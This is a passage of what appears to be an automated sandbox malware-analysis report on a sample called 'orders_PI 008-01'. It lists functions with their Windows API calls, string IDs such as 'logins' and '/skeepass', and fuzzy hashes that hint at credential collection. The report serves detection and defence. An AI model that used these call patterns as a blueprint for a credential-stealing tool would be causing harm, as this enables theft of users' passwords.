                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                          • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                          • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                          • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                        • wcscpy.MSVCRT ref: 0040DC2D
                                        • wcscpy.MSVCRT ref: 0040DC3C
                                        • wcscpy.MSVCRT ref: 0040DC4C
                                        • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                        • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                        • wcscpy.MSVCRT ref: 0040DCC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                        • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                        • API String ID: 3330709923-517860148
                                        • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                        • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                        • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                        • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                        Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                          • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                          • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                        • memset.MSVCRT ref: 0040806A
                                        • memset.MSVCRT ref: 0040807F
                                        • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                        • _wcsicmp.MSVCRT ref: 004081C3
                                        • memset.MSVCRT ref: 004081E4
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                          • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                          • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                          • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                          • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                          • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                          • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                        • String ID: logins$null
                                        • API String ID: 2148543256-2163367763
                                        • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                        • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                        • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                        • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                        Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                        • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                        • memset.MSVCRT ref: 004085CF
                                        • memset.MSVCRT ref: 004085F1
                                        • memset.MSVCRT ref: 00408606
                                        • strcmp.MSVCRT ref: 00408645
                                        • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                        • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                        • memset.MSVCRT ref: 0040870E
                                        • strcmp.MSVCRT ref: 0040876B
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                        • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                        • String ID: ---
                                        • API String ID: 3437578500-2854292027
                                        • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                        • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                        • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                        • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                        Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0041087D
                                        • memset.MSVCRT ref: 00410892
                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                        • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                        • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                        • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                        • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                        • GetSysColor.USER32(0000000F), ref: 00410999
                                        • DeleteObject.GDI32(?), ref: 004109D0
                                        • DeleteObject.GDI32(?), ref: 004109D6
                                        • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                        • String ID:
                                        • API String ID: 1010922700-0
                                        • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                        • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                        • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                        • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                        Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                        • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                        • malloc.MSVCRT ref: 004186B7
                                        • free.MSVCRT ref: 004186C7
                                        • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                        • free.MSVCRT ref: 004186E0
                                        • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                        • malloc.MSVCRT ref: 004186FE
                                        • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                        • free.MSVCRT ref: 00418716
                                        • free.MSVCRT ref: 0041872A
                                        • free.MSVCRT ref: 00418749
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free$FullNamePath$malloc$Version
                                        • String ID: |A
                                        • API String ID: 3356672799-1717621600
                                        • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                        • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                        • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                        • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                        Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                        • API String ID: 2081463915-1959339147
                                        • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                        • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                        • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                        • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                        Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                        • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                        • API String ID: 2012295524-70141382
                                        • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                        • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                        • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                        • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                        Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                        • API String ID: 667068680-3953557276
                                        • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                        • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                        • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                        • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                        Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(00000000), ref: 004121FF
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                        • SetBkMode.GDI32(?,00000001), ref: 00412232
                                        • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                        • SelectObject.GDI32(?,?), ref: 00412251
                                        • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                        • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                          • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                          • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                          • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                        • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                        • SetCursor.USER32(00000000), ref: 004122BC
                                        • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                        • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                        • String ID:
                                        • API String ID: 1700100422-0
                                        • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                        • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                        • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                        • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                        Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 004111E0
                                        • GetWindowRect.USER32(?,?), ref: 004111F6
                                        • GetWindowRect.USER32(?,?), ref: 0041120C
                                        • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                        • GetWindowRect.USER32(00000000), ref: 0041124D
                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                        • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                        • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                        • EndDeferWindowPos.USER32(?), ref: 0041130B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$Defer$Rect$BeginClientItemPoints
                                        • String ID:
                                        • API String ID: 552707033-0
                                        • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                        • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                        • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                        • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                        Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                          • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                          • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                          • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                        • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                        • strchr.MSVCRT ref: 0040C140
                                        • strchr.MSVCRT ref: 0040C151
                                        • _strlwr.MSVCRT ref: 0040C15F
                                        • memset.MSVCRT ref: 0040C17A
                                        • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                        • String ID: 4$h
                                        • API String ID: 4066021378-1856150674
                                        • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                        • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                        • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                        • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                        Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$_snwprintf
                                        • String ID: %%0.%df
                                        • API String ID: 3473751417-763548558
                                        • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                        • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                        • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                        • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                        Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                        • KillTimer.USER32(?,00000041), ref: 004060D7
                                        • KillTimer.USER32(?,00000041), ref: 004060E8
                                        • GetTickCount.KERNEL32 ref: 0040610B
                                        • GetParent.USER32(?), ref: 00406136
                                        • SendMessageW.USER32(00000000), ref: 0040613D
                                        • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                        • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                        • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                        • String ID: A
                                        • API String ID: 2892645895-3554254475
                                        • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                        • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                        • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                        • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
